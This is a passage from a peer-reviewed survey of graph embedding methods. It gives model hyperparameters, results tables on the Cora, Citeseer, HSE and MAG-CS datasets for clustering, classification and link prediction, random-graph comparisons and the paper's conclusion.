Scikit-learn. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 27/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Remark. The common way to use graph neural networks is semi-supervised training. Such an approach gives a bias towards the usage of that model, because embedding learns not only graph structure and feature transformations, but supervised information about labels on the other hand. So we train graph neural networks in an unsupervised way because our study is aimed to understand how different properties of embedding models can help in considered tasks. Models We select several models of different types mentioned in “Methods for Constructing Graph Embedding” that preserve different properties of a graph. The general idea is to compare models of different fitting approaches with respect to network properties. Matrix factorization based models: � GraRep is symmetric and preserves high-proximity. The default K-hop order is 5, the number of SVD iterations is 20, a random seed is 42. � HOPE directly models asymmetric similarities. � M-NMF preserves community structure. The default number of clusters is 20, clustering penalty is 0.05, modularity regularization penalty is 0.05, similarity mixing parameter is 5, the number of power-iterations is 200, early stopping step is 3. Random-walks based models: � Node2vec is a baseline for sequential methods which efficiently trade-offs between different proximity levels. The default walk length is 80, the number of walks per node is 10, return hyper-parameter is 1, in-out hyper-parameter is 1. � Diff2vec use diffusion to sample random walks. The default number of nodes per diffusion tree is 80, the number of diffusions per source node is 10, context-size is 10, the number of ASGD iterations is 1, the learning rate is 0.025. � Walklets allow to model different levels of community structure and generalize GraRep model. Default random walk length is 80, the number of random walks per source node is 5, the window size is 5, the minimal number of appearances is 1, the order of random walk is first, return hyper-parameter is 1, in-out hyper-parameter is 1. � GEMSEC directly cluster nodes. Default random walk length is 80, the number of random walks per source node is 5, the window size is 5, the minimal number of appearances is 1, the order of random walk is first, return hyper-parameter is 1, in-out hyper-parameter is 1, distortion is 0.75, negative samples number is 10, the initial learning rate is 0.001, annealing factor for learning rate is 1, initial clustering weight coefficient is 0.1, final clustering weight coefficient is 0.5, smoothness regularization penalty is 0.0625, the number of clusters is 20, normalized overlap weight regularization. Deep learning models: � GCN is a baseline for deep learning models. The default number of epochs is 200, dropout is 0.3, the learning rate is 0.01, weight decay is 0.0005, the number of hidden layers is 1. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 28/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ � GraphSage (GS) improves GCN by reducing the number of neighbors while weighting the node vectors. The dropout is 0.1, aggregation is GCN, the number of epochs is 200, the learning rate is 0.01, weight decay is 0.0005. � GAT utilizes an attention mechanism. The number of epochs is 200, in-dropout is 0.1, attention dropout is 0.1, the learning rate is 0.005, the negative slope is 0.2, weight decay is 0.0005, the number of hidden layers is 1. RESULTS The current section has the following structure. We start the analysis from node clustering tasks because it also helps to understand the performance of graph embeddings on the other tasks. Further, we describe node classification task and link prediction followed by network visualization. We also conducted experiments on random graphs to study the difference of graph embeddings on real-world networks and simulated ones. Node clustering The results on the node clustering task are presented in Table 3. Rows depict different models, which are grouped by model type: matrix factorization, random walks, graph neural networks with and without features. On the columns, we can see results on different datasets. For each dataset, we calculate two metrics: modularity and silhouette score. Highlighted results are the best. In node clustering task, results are pretty obvious: the embeddings, which work with community structure, perform the best in terms of modularity. GEMSEC directly penalizes embeddings for low modularity score with K-Means objective, Walklets catches this information by accounting for several levels of node neighborhood. Importance of such information could be proven by the comparatively high value of GraRep model, that works pretty similar to Walklets. Graph neural networks with features give comparatively better results, meaning that node content helps to describe graph structure. GraphSAGE and GAT efficiently utilize the local structure of the network. The main difference is that GAT aggregates over the entire neighborhood, but GraphSAGE aggregates only over a fix-sized sample. In the case of MAG CS graph (Table 4) the best results show GAT and GCN. It means that in the case of large, heterogeneous graph features play a major role. Interesting, that GAT without features works much better than other structural models. It could refer to the attention, that selects only the most important neighbors in node embedding construction. It seems that the attention mechanism helps in this case to distinguish heterogeneous edge nature. GNN models trained in unsupervised fashion give poor results because they highly rely on the features when constructing embeddings even for learning graph structure. The clustering results show that specific losses can dramatically increase quality on a specific task. As we will see further, such losses are also helpful in the node classification task preserving important graph properties. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 29/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Node classification The results on node classification task are presented in Table 5. Rows show different types of models and columns show different datasets. For each dataset, we calculate accuracy for three different models: gradient boosted machines, logistic regression and random forest. Highlighted results are the best. Models that have good performance in node clustering task also show high score in node classification. Labels in given datasets show different topics of articles, as soon as usually authors are dedicated to specific topics, so natural communities are constructed within these labels. This can also be proven by high modularity and assortativity coefficients of label communities for all graphs. In the classification task, it is also important to have a good separation of clusters, that could be measured by the silhouette coefficient. We can see those models that keep both high modularity and high silhouette work better. Linear models show the comparatively lower score, but for random walk based embeddings, this difference is much less severe. Most of considered random walk models are based on Skip-Gram approach, which is a log-linear model. It reduces expression quality of the model but allows to learn vectors that perform well in linear models. Results for MAG CS are presented in Table 6. Firstly, we compare fewer models, because we were not able to compute some embeddings for such a large graph, so we choose the Table 3 Results of model validation on node clustering task (both metrics lie between (−1,1) and higher value means better results). Bold corresponds to the best metric for each dataset. CORA CITESEER HSE Modularity Silhouette Modularity Silhouette Modularity Silhouette GRAREP (Cao, Lu & Xu, 2015) 0.2249 0.1902 0.0320 0.3159 0.2320 0.3163 HOPE (Ou et al., 2016) 0.1222 0.2593 0.1748 0.5492 0.0027 0.6684 NODE2VEC (Grover & Leskovec, 2016) 0.0106 0.1000 −0.0018 0.0464 0.0419 0.5576 DIFF2VEC (Rozemberczki & Sarkar, 2018) 0.1289 0.5412 0.0292 0.5422 0.1155 0.5429 GEMSEC (Rozemberczki et al., 2018) 0.7684 0.2280 0.7555 0.1508 0.7710 0.1678 WALKLETS (Perozzi, Kulkarni & Skiena, 2016) 0.7353 0.0812 0.7263 0.0566 0.7593 0.0667 GCN Kipf & Welling (2016a) 0.3800 0.3336 0.3754 0.4215 – – GRAPHSAGE ( Hamilton, Ying & Leskovec, 2017a) 0.6455 0.3311 0.5774 0.4757 – – GAT (Veličković et al., 2017) 0.7209 0.3477 0.7367 0.3797 – – GCN (NF) −0.0096 0.3979 0.0360 0.4999 0.0008 0.6837 GRAPHSAGE (NF) 0.0212 0.7672 0.0960 0.9442 0.0552 0.8381 GAT (NF) 0.1335 0.2001 0.2968 0.3641 0.1400 0.6390 Table 4 Results of model validation on node clustering task for MAG-CS dataset (both metrics lie between (−1,1) and higher value means better results). HOPE NODE2VEC GRAREP WALKLETS GCN GAT GCN (NF) GAT (NF) Modularity −0.0001 −0.0037 0.0027 0.0025 0.3462 0.3446 0.0112 0.1951 Silhouette 0.6548 0.0771 0.2348 0.0441 0.2369 −0.0261 0.4654 0.0411 Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 30/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ fastest ones with good performance in other experiments. HOPE outperforms other classic non-attributed embeddings. It is also interesting that the linear mixture of embedding elements works much better for this embedding then others. One of the reasons for such behavior is that in the large graphs, embeddings could be noisy and simple models could give better quality. It could be also a reason for the worse performance of K-hop based embeddings (Walklets and GraRep). But the main driver in node classification quality is the features of nodes. It could be seen from the high results of GCN and GAT models. HOPE has a dramatic difference between linear and non-linear models because it estimates Katz centrality, which has non-linear nature. Also, we use HOPE implementation from GEM Goyal & Ferrara (2017), where node embedding is achieved as a concatenation of its self- and context-representations. The non-linear model helps to reconstruct the dot Table 5 Results of model validation on node classification task (accuracy metric lies between (0,1) and higher value means better results). Bold corresponds to the best metric for each dataset. GBM LR RF CORA GRAREP (Cao, Lu & Xu, 2015) 0.7610 ± 0.0434 0.7503 ± 0.0323 0.7751 ± 0.0254 HOPE (Ou et al., 2016) 0.7518 ± 0.0333 0.3024 ± 0.0308 0.7614 ± 0.0289 M-NMF (Wang et al., 2017d) 0.2596 ± 0.0250 0.2799 ± 0.0324 0.2633 ± 0.0239 NODE2VEC (Grover & Leskovec, 2016) 0.2522 ± 0.0200 0.2441 ± 0.0273 0.2441 ± 0.0257 DIFF2VEC (Rozemberczki & Sarkar, 2018) 0.2212 ± 0.0635 0.2843 ± 0.0387 0.2500 ± 0.0293 GEMSEC (Rozemberczki et al., 2018) 0.8338 ± 0.0326 0.8153 ± 0.0390 0.8634 ± 0.0251 WALKLETS (Perozzi, Kulkarni & Skiena, 2016) 0.8142 ± 0.0252 0.8124 ± 0.0317 0.8327 ± 0.0326 GCN (Kipf & Welling, 2016a) 0.7803 ± 0.0378 0.6588 ± 0.0448 0.7718 ± 0.0380 GRAPHSAGE (Hamilton, Ying & Leskovec, 2017a) 0.8083 ± 0.0358 0.7385 ± 0.0391 0.8168 ± 0.0316 GAT (Veličković et al., 2017) 0.8194 ± 0.0304 0.7455 ± 0.0420 0.8264 ± 0.0324 GCN (NF) 0.3021 ± 0.0204 0.2969 ± 0.0238 0.2888 ± 0.0194 GRAPHSAGE (NF) 0.3017 ± 0.0298 0.3021 ± 0.0305 0.3017 ± 0.0298 GAT (NF) 0.3021 ± 0.0305 0.3021 ± 0.0305 0.3021 ± 0.0305 CITESEER GRAREP (Cao, Lu & Xu, 2015) 0.5582 ± 0.0577 0.5110 ± 0.0443 0.5834 ± 0.0453 HOPE (Ou et al., 2016) 0.5468 ± 0.0346 0.2663 ± 0.0443 0.5489 ± 0.0378 M-NMF (Wang et al., 2017d) 0.1767 ± 0.0220 0.1978 ± 0.0241 0.1909 ± 0.0311 NODE2VEC (Grover & Leskovec, 2016) 0.1815 ± 0.0253 0.1806 ± 0.0165 0.1867 ± 0.0237 DIFF2VEC (Rozemberczki & Sarkar, 2018) 0.2035 ± 0.0373 0.2239 ± 0.0281 0.1930 ± 0.0287 GEMSEC (Rozemberczki et al., 2018) 0.6754 ± 0.0343 0.5867 ± 0.0427 0.7175 ± 0.0247 WALKLETS (Perozzi, Kulkarni & Skiena, 2016) 0.6291 ± 0.0280 0.6243 ± 0.0228 0.6480 ± 0.0277 GCN (Kipf & Welling, 2016a) 0.6312 ± 0.0210 0.5092 ± 0.0272 0.6342 ± 0.0209 GRAPHSAGE (Hamilton, Ying & Leskovec, 2017a) 0.6450 ± 0.0228 0.5425 ± 0.0192 0.6586 ± 0.0309 GAT (Veličković et al., 2017) 0.6733 ± 0.0238 0.5582 ± 0.0443 0.6763 ± 0.0220 GCN (NF) 0.2729 ± 0.0272 0.2317 ± 0.0336 0.2792 ± 0.0260 GRAPHSAGE (NF) 0.1996 ± 0.0409 0.1996 ± 0.0409 0.1996 ± 0.0409 GAT (NF) 0.1996 ± 0.0409 0.1996 ± 0.0409 0.1996 ± 0.0409 Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 31/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ product decoder. A similar argument can explain diversity in neural network models, but it has less variance because of high clustering efficiency. Link prediction Table 7 shows results for link prediction task. It is separated into three groups by datasets. Rows represent different graph embedding models and columns show different second- level classification models: gradient boosted machines, logistic regression and random forest. Highlighted results are the best. In the link prediction task, we can also see the importance of clustering. Links are more likely to occur within one community. The high-proximity models also work much better, because in that task we need to understand how similar are non-connected nodes. The performance of the HOPE model in this task is more significant. HOPE model concentrates on preserving asymmetric transitivity. The older paper can not cite the newer one. GCN without features performs much better than other graph neural networks. It accounts for the whole neighborhood and directly uses the adjacency matrix to train embeddings. Results for MAG CS (Table 8) are consistent with these findings. However, despite the good quality on the community clustering task, GAT without features shows pure performance on the Link prediction task. However, GCN without features is close to the GAT with features. It means that in this task it is necessary to account the whole neighborhood. A dramatic difference in the quality of linear and non-linear models can be explained by the objective of the link prediction task. It requires to model the proximity between to nodes. Such metrics are non-linear. So for reconstructing it from concatenated vectors of nodes, we need some non-linear transformations. Graph visualization We present results of node clustering jointly with network visualization using UMAP technique. The results for three different datasets are shown at Fig. 1 for Cora, Fig. 2 for Citeseer, and Fig. 3 for HSE datasets, respectively. Table 6 Results of model validation on node classification task for MAG-CS dataset (accuracy metric lies between (0,1) and higher value means better results). Bold corresponds to the best metric for each dataset. GBM LR RF GRAREP (Cao, Lu & Xu, 2015) 0.1915 ± 0.0162 0.1404 ± 0.0217 0.1737 ± 0.0169 HOPE (Ou et al., 2016) 0.1985 ± 0.0233 0.2255 ± 0.021 0.1665 ± 0.0184 NODE2VEC (Grover & Leskovec, 2016) 0.1882 ± 0.034 0.2048 ± 0.0332 0.168 ± 0.0195 WALKLETS (Perozzi, Kulkarni & Skiena, 2016) 0.1866 ± 0.0171 0.1527 ± 0.0084 0.1886 ± 0.0189 GCN (Kipf & Welling, 2016a) 0.752 ± 0.0177 0.7317 ± 0.0166 0.7568 ± 0.0176 GAT (Veličković et al., 2017) 0.6272 ± 0.0188 0.6424 ± 0.0202 0.6095 ± 0.0208 GCN (NF) 0.2089 ± 0.0154 0.2255 ± 0.021 0.1738 ± 0.0117 GAT (NF) 0.2255 ± 0.021 0.2255 ± 0.021 0.2255 ± 0.021 Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 32/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Table 7 Results of model validation on link prediction task (accuracy metric lies between (0,1) and higher value means better results). Bold corresponds to the best metric for each dataset. GBM LR RF CORA GRAREP (Cao, Lu & Xu, 2015) 0.8766 ± 0.0056 0.7585 ± 0.0037 0.9143 ± 0.0021 HOPE (Ou et al., 2016) 0.9422 ± 0.0039 0.6706 ± 0.0032 0.9478 ± 0.0020 M-NMF (Wang et al., 2017d) 0.6507 ± 0.0038 0.6252 ± 0.0018 0.6618 ± 0.0022 NODE2VEC (Grover & Leskovec, 2016) 0.7047 ± 0.0039 0.6185 ± 0.0037 0.7060 ± 0.0042 DIFF2VEC (Rozemberczki & Sarkar, 2018) 0.7780 ± 0.0049 0.7508 ± 0.0045 0.7413 ± 0.0029 GEMSEC (Rozemberczki et al., 2018) 0.9692 ± 0.0030 0.6512 ± 0.0052 0.9653 ± 0.0011 WALKLETS (Perozzi, Kulkarni & Skiena, 2016) 0.9153 ± 0.0058 0.7073 ± 0.0022 0.9574 ± 0.0017 GCN (Kipf & Welling (2016a) 0.8784 ± 0.0028 0.7094 ± 0.0041 0.8978 ± 0.0022 GRAPHSAGE (Hamilton, Ying & Leskovec, 2017a) 0.8988 ± 0.0050 0.5668 ± 0.0049 0.9111 ± 0.0028 GAT (Veličković et al., 2017) 0.9127 ± 0.0047 0.5666 ± 0.0063 0.9337 ± 0.0021 GCN (NF) 0.7852 ± 0.0060 0.7084 ± 0.0033 0.8014 ± 0.0024 GRAPHSAGE (NF) 0.5459 ± 0.0043 0.5033 ± 0.0021 0.5459 ± 0.0043 GAT (NF) 0.5033 ± 0.0021 0.5033 ± 0.0021 0.5033 ± 0.0021 CITESEER GRAREP (Cao, Lu & Xu, 2015) 0.8786 ± 0.0046 0.7198 ± 0.0049 0.9254 ± 0.0031 HOPE (Ou et al., 2016) 0.8985 ± 0.0074 0.6358 ± 0.0052 0.9119 ± 0.0029 M-NMF (Wang et al., 2017d) 0.5926 ± 0.0049 0.5685 ± 0.0033 0.6215 ± 0.0031 NODE2VEC (Grover & Leskovec, 2016) 0.6895 ± 0.0050 0.6315 ± 0.0056 0.6934 ± 0.0046 DIFF2VEC (Rozemberczki & Sarkar, 2018) 0.7553 ± 0.0038 0.7258 ± 0.0038 0.7206 ± 0.0060 GEMSEC (Rozemberczki et al., 2018) 0.9827 ± 0.0031 0.6151 ± 0.0096 0.9726 ± 0.0026 WALKLETS (Perozzi, Kulkarni & Skiena, 2016) 0.8688 ± 0.0066 0.6672 ± 0.0040 0.9429 ± 0.0024 GCN (Kipf & Welling, 2016a) 0.8863 ± 0.0033 0.6910 ± 0.0032 0.9052 ± 0.0024 GRAPHSAGE (Hamilton, Ying & Leskovec, 2017a) 0.8952 ± 0.0037 0.6082 ± 0.0036 0.8998 ± 0.0034 GAT (Veličković et al., 2017) 0.9175 ± 0.0030 0.6136 ± 0.0051 0.9306 ± 0.0025 GCN (NF) 0.7892 ± 0.0039 0.6881 ± 0.0044 0.8100 ± 0.0034 GRAPHSAGE (NF) 0.5181 ± 0.0039 0.5037 ± 0.0026 0.5181 ± 0.0039 GAT (NF) 0.5037 ± 0.0026 0.5037 ± 0.0026 0.5037 ± 0.0026 HSE GRAREP (Cao, Lu & Xu, 2015) 0.9202 ± 0.0068 0.7956 ± 0.0032 0.9332 ± 0.0022 HOPE (Ou et al., 2016) 0.6590 ± 0.0050 0.6062 ± 0.0055 0.7022 ± 0.0038 M-NMF (Wang et al. (2017d) 0.6824 ± 0.0058 0.6277 ± 0.0041 0.7467 ± 0.0032 NODE2VEC (Grover & Leskovec, 2016) 0.7257 ± 0.0049 0.6634 ± 0.0034 0.7592 ± 0.0039 DIFF2VEC (Rozemberczki & Sarkar, 2018) 0.7850 ± 0.0040 0.7505 ± 0.0037 0.7795 ± 0.0034 GEMSEC (Rozemberczki et al., 2018) 0.9724 ± 0.0035 0.7065 ± 0.0043 0.9671 ± 0.0013 WALKLETS (Perozzi, Kulkarni & Skiena, 2016) 0.9484 ± 0.0028 0.7730 ± 0.0035 0.9615 ± 0.0022 GCN (NF) (Kipf & Welling, 2016a) 0.8178 ± 0.0021 0.7867 ± 0.0031 0.8214 ± 0.0030 GRAPHSAGE (NF) (Hamilton, Ying & Leskovec, 2017a) 0.5071 ± 0.0026 0.5039 ± 0.0030 0.5071 ± 0.0026 GAT (NF) (Veličković et al., 2017) 0.5039 ± 0.0030 0.5039 ± 0.0030 0.5039 ± 0.0030 Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 33/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ The best visualization in terms of community structure seems to be Walklets and GraRep models, which give nicely distinguishable clusters in all the cases. Both models work in the same way with k-hop similarity of vertices. GEMSEC also provides separate cluster picture but creates a lot of noisy points. Interestingly, that HOPE also split graphs into several parts, but we can see by the modularity score, such parts are not correlated with node communities. Such an effect could occur because HOPE embedding has non-homogeneous structure due to concatenation of self- and context-representations. In the case of graph neural networks, except for GAT, all clusters have poor separation. Such effect occurs because GNN weights neighborhood node attributes, so boundary nodes will be close. GAT allows mitigating this problem because utilizes the attention mechanism, which weights meaningless node neighbors to zero. Table 8 Results of model validation on link prediction task for MAG-CS dataset (accuracy metric lies between (0,1) and higher value means better results). Bold corresponds to the best metric for each dataset. GBM LR RF GRAREP (Cao, Lu & Xu, 2015) 0.5986 ± 0.0047 0.5626 ± 0.0016 0.5998 ± 0.0025 HOPE (Ou et al., 2016) 0.566 ± 0.0017 0.5275 ± 0.0025 0.6007 ± 0.0027 NODE2VEC (Grover & Leskovec, 2016) 0.578 ± 0.0023 0.5425 ± 0.0015 0.6137 ± 0.0031 WALKLETS (Perozzi, Kulkarni & Skiena, 2016) 0.5798 ± 0.0024 0.5647 ± 0.0015 0.6077 ± 0.0027 GCN (Kipf & Welling, 2016a) 0.8486 ± 0.0022 0.6553 ± 0.0014 0.8772 ± 0.0012 GAT (Veličković et al., 2017) 0.7293 ± 0.0041 0.5632 ± 0.0024 0.7524 ± 0.0027 GCN (NF) 0.7253 ± 0.0012 0.697 ± 0.0014 0.7261 ± 0.0017 GAT (NF) 0.5015 ± 0.0009 0.5015 ± 0.0009 0.5015 ± 0.0009 Figure 1 UMAP projection of CORA embeddings: (A) HOPE. (B) Node2Vec. (C) Diff2Vec. (D) GraRep. (E) Walklets. (F) GEMSEC. (G) M-NMF. (H) GCN. (I) GraphSage. (J) GAT. Full-size DOI: 10.7717/peerj-cs.357/fig-1 Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 34/62 http://dx.doi.org/10.7717/peerj-cs.357/fig-1 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ It seems that one of the most important graph property in the studied tasks is the community structure. So, most of the methods, that works with it directly allow to achieve the best scores. It is also connected to the level of proximity because it is indirectly connected with the community structure. The graph neural networks allow to easily catch node attributes, but miss most of graph properties information, so it performs on the level of baseline models without it. Random graphs In order to understand robustness of graph embeddings, we decided to test how modeling real-world network with random graphs impact on the quality of graph embeddings for simulated networks. Firstly, we should explain the formation of random graphs in different models. Erdös & Rényi (1959) builds the graphs using a simple binomial rule for creating an edge with a given density of graph. Barabási & Albert (1999) starts from a small graph and sequentially adds a new node with a given density and connects existing nodes using preferential attachment rule. In the Watts & Strogatz (1998) model, the regular lattice is firstly constructed followed by edge rewiring procedure. We build random graphs regarding the properties of real-world graphs. To build ER graph one need to have a number of nodes and edges in the graph. For the BA graph construction, it is required to have a number of nodes and number of edges for the newly added node at each iteration. It is a small integer, so we just select the best to fit the number of edges of benchmarks. The parameters of WS graphs were chosen based on the number of nodes, edges and average clustering of graphs following formulae: the number of edges in starting lattice is equal to k = [2# edges# nodes], the rewriting probability is equal to p ¼ 1 � ffiffi ½ p 3�4ðk � 1Þ=3ðk � 2Þ � ðaverage clusteringÞ (Barrat & Weigt, 2000). Figure 2 UMAP projection of Citeseer embeddings: (A) HOPE. (B) Node2Vec. (C) Diff2Vec. (D) GraRep. (E) Walklets. (F) GEMSEC. (G) M-NMF. (H) GCN. (I) GraphSage. (J) GAT. Full-size DOI: 10.7717/peerj-cs.357/fig-2 Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 35/62 http://dx.doi.org/10.7717/peerj-cs.357/fig-2 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ One of the main properties of all random graph models is the giant connected component. So embedding models learn it on the train part and works better than random in link prediction task in all cases. Additionally, in the BA model, there are some nodes with much larger density than others, so it is easier to predict missed links. Watts–Strogatz also has a straightforward mechanism of edge construction, where the shortest path is small. In both BA and WS models it is also possible to reproduce community structure. We can see it by large modularity metric in the clustering task. Random graph modeling is one of the efficient methods in network science for evaluation of different model properties. For example, comparison of real-graph with its random analog could help to understand how good is the received quality for the specific task. We follow this idea and compare two embeddings models Walklets and HOPE. Figure 3 UMAP projection of HSE embeddings: (A) HOPE. (B) Node2Vec. (C) Diff2Vec. (D) GraRep. (E) Walklets. (F) GEMSEC. (G) M-NMF. (H) GCN. (I) GraphSage. (J) GAT. Full-size DOI: 10.7717/peerj-cs.357/fig-3 Table 9 Results of model validation on node clustering task for random graphs (both metrics lie between (−1,1) and higher value means better results. Bold corresponds to the best metric for each dataset. HOPE WALKLETS Modularity Silhouette Modularity Silhouette CORA (Original) 0.1222 0.2593 0.7353 0.0812 CORA (Barabási-Albert) 0.0005 0.1807 0.1465 0.0046 CORA (Erdős-Rényi) −0.0022 0.0216 0.0184 0.0080 CORA (Watts-Strogatz) 0.0629 0.1180 0.5251 0.0212 CITESEER (Original) 0.1748 0.5492 0.7263 0.0566 CITESEER (Barabási-Albert) −0.0008 0.3731 0.0397 −0.0006 CITESEER (Erdős-Rényi) 0.0031 0.1495 −0.0040 0.0085 CITESEER (Watts-Strogatz) 0.0344 0.1270 0.4941 0.0155 Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 36/62 http://dx.doi.org/10.7717/peerj-cs.357/fig-3 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Table 10 Results of model validation on link prediction task for random graphs (accuracy metric lies between (0,1) and higher value means better results). Bold corresponds to the best metric for each dataset. RF LR GBM Walklets CORA Original 0.8142 ± 0.0252 0.8124 ± 0.0317 0.8327 ± 0.0326 CORA-ER 0.617 ± 0.0081 0.5658 ± 0.013 0.5904 ± 0.0141 CORA-BA 0.7216 ± 0.0113 0.6928 ± 0.0103 0.7271 ± 0.0136 CORA-WS 0.6511 ± 0.0329 0.5168 ± 0.0075 0.7442 ± 0.0762 CITESEER Original 0.6291 ± 0.0280 0.6243 ± 0.0228 0.6480 ± 0.0277 CITESEER-ER 0.5505 ± 0.0062 0.5335 ± 0.0071 0.5411 ± 0.0076 CITESEER-BA 0.6807 ± 0.0071 0.662 ± 0.0123 0.6871 ± 0.018 CITESEER-WS 0.571 ± 0.0142 0.5232 ± 0.022 0.6121 ± 0.031 HOPE CORA Original 0.7518 ± 0.0333 0.3024 ± 0.0308 0.7614 ± 0.0289 CORA-ER 0.5936 ± 0.0042 0.5114 ± 0.0055 0.5734 ± 0.0063 CORA-BA 0.6521 ± 0.0071 0.5559 ± 0.0144 0.6312 ± 0.007 CORA-WS 0.5115 ± 0.0048 0.51 ± 0.0052 0.5132 ± 0.0071 CITESEER Original 0.5468 ± 0.0346 0.2663 ± 0.0443 0.5489 ± 0.0378 CITESEER-ER 0.5509 ± 0.015 0.5066 ± 0.0029 0.5439 ± 0.01 CITESEER-BA 0.6304 ± 0.0116 0.5422 ± 0.0071 0.6096 ± 0.0056 CITESEER-WS 0.5169 ± 0.0057 0.5093 ± 0.0058 0.521 ± 0.0088 Figure 4 UMAP projection of Citeseer based random graph embeddings: (A) Original graph, HOPE. (B) Erdős-Rényi, HOPE. (C) Barabási- Albert, HOPE. (D) Watts-Strogatz, HOPE. (E) Original graph, Walklets. (F) Erdős-Rényi, Walklets. (G) Barabási-Albert, Walklets. (H) Watts- Strogatz, Walklets. Full-size DOI: 10.7717/peerj-cs.357/fig-4 Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 37/62 http://dx.doi.org/10.7717/peerj-cs.357/fig-4 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ We select these embeddings because it is non-context, show good performance and saves different properties. Walklets preserves K-hop similarity and HOPE preserves asymmetric transitivity. Similarly to the experiments on the real-world graphs, Walklets shows superior performance in comparison to the HOPE in Clustering (Table 9) and LPP (Table 10) tasks. However, visually (Figs. 4 and 5) it better separates dense clusters. The Walklets visualization of random graphs differs from real-world cases. Random graphs give much sparser and visually harder to distinguish structure. The results on random graphs and real networks differ sufficiently. It means that embedding models could really learn graph structure and its properties. Also, such citation networks are poorly described by random graph models. CONCLUSION In the current work, we present a comprehensive survey of graph embedding techniques. The work overviews different types of graph embeddings with respect to methods, network types, their applications to computer science domains. One of the main achievements at the moment are the scalable models. The GNN could be trained in batch and distributed fashion. Such methods allow using powerful attribute- aware models for real-world large graphs. However, only a few works analyze the proper strategies for batch sampling and its effect on the final results in terms of bias-variance trade-off. Another way to accelerate GNN training is to coarse a graph, but it could affect Figure 5 UMAP projection of CORA based random graph embeddings: (A) Original graph, HOPE. (B) Erdős-Rényi, HOPE. (C) Barabási- Albert, HOPE. (D) Watts-Strogatz, HOPE. (E) Original graph, Walklets. (F) Erdős-Rényi, Walklets. (G) Barabási-Albert, Walklets. (H) Watts-Strogatz, Walklets. Full-size DOI: 10.7717/peerj-cs.357/fig-5 Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 38/62 http://dx.doi.org/10.7717/peerj-cs.357/fig-5 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ dramatically the final quality of the model. So, the understanding and further developing of coarsening and sampling techniques is the promising direction. One of the most popular technique for graph embedding at the current time is the attention mechanism. It helps to account for some significant properties of a graph like temporality and heterogeneity by introducing attention in different dimensions: time, different levels of edge and nodes types. However, this method could be exhaustive in terms of computation, so it should be used with acceleration techniques. The other research direction that grows rapidly is the stability of graph embeddings. The popular practices are to use variational graph autoencoders with Gaussian denoising or adversarial training. The development of scalable and high-quality graph neural networks leads to an increase in the number of applications to the non-graph domain. The most common application of it is the modeling of similarity or nearest neighbors graphs. Such approaches are presented in natural language processing, computer vision and recommender systems. However, in many fields, structures could be natively presented as graphs in terms of labels (samples of one type are connected), interaction, knowledge or relation graphs. Our survey covers the most complete of methods and application in different computer science domains related to machine learning problems on relational data. In addition, in the experiment part of the study we provide results on training best graph embedding models for node classification, link prediction, node clustering and network visualization tasks for different types of models and graphs to understand why certain graph embedding perform better than others on benchmark datasets under different training settings. Our experiments explain how different embeddings work with different properties uncovering graph inner properties and descriptive statistics impact on the models performance. As one of the most interesting findings, we show that structural embeddings with proper objectives achieve competitive quality vs graph neural networks. Still, it could be hard to apply such methods to large graphs. Firstly, there is a problem with high computational complexity. Graph neural networks solve this issue by using batch training and sampling techniques. Another problem is that learned structural embeddings for large graphs could be noisy. However, adding the node attributes helps to concentrate on the specific important properties. Modern models focus on accounting for node attributes, but it was found that more important question is how to balance a trade-off between node attributes and network structure. Our work will be helpful in the further development of such generalization methods to answer this question. Such methods will allow to easily apply graph models in different domains. ADDITIONAL INFORMATION AND DECLARATIONS Funding The work of Nikita Nikitinsky on Section 6 was supported by the Russian Science Foundation grant 19-11-00281. The OA fee was covered under support of Faculty of Computer Science, HSE University. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 39/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Grant Disclosures The following grant information was disclosed by the authors: Russian Science Foundation: 19-11-00281. Faculty of Computer Science, HSE University. Competing Interests The authors declare that they have no competing interests. Author Contributions � Ilya Makarov conceived and designed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Dmitrii Kiselev conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Nikita Nikitinsky conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � Lovro Subelj conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Metric evaluation code for each of the presented tasks is available in the Supplemental Files. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.357#supplemental-information. REFERENCES Abdelaziz I, Fokoue A, Hassanzadeh O, Zhang P, Sadoghi M. 2017. Large-scale structural and textual similarity-based mining of knowledge graph to predict drug-drug interactions. Journal of Web Semantics 44:104–117 DOI 